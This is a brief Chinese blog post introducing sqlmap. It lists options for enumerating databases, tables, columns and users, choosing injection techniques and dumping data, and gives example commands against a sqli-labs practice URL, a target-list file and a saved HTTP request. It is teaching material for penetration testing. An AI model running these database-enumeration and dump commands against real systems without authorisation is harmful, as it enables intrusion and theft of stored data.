sqlmap基础
Posted 小洋葱头头
tags:
篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了sqlmap基础相关的知识,希望对你有一定的参考价值。
一览:
查看帮助:sqlmap -h
指定url: -u /--url
--batch 使用默认配置
-m 指定文件
-D 指定数据库
-T 指定表
-C 指定字段
-dbs 探测数据库
--tables 探测数据库表名
--columns 探测字段名
--user 探测数据库用户名
-r 指定http请求文件
--level2 指定探测级别
--technique=B 检测sql注入的类型
B:布尔盲注
E:报错注入
U:联合查询注入
S:注册表相关注入
T:时间盲注
--dump #转储获取到的数据库信息。
--proxy 指定代理
--proxy-file 指定代理文件
举例:
列一(对单个):
命令:
sqlmap -u 'http://192.168.10.183/sqli-labs/Less-1/?id=1' --dbs --batch
列二(从文件中读取):
命令:
sqlmap -m csdnsql.txt --dbs --batch
列三(http头注入):
注:将http头放在一个txt文件里,想测试那个地方就在那个地方放‘*’
列:
命令:
sqlmap -r http_1.txt --dbs --batch
以上是关于sqlmap基础的主要内容,如果未能解决你的问题,请参考以下文章
SQLMAP深入分析-使用篇(基础使用进阶命令tamper脚本)
SQLMAP深入分析-使用篇(基础使用进阶命令tamper脚本)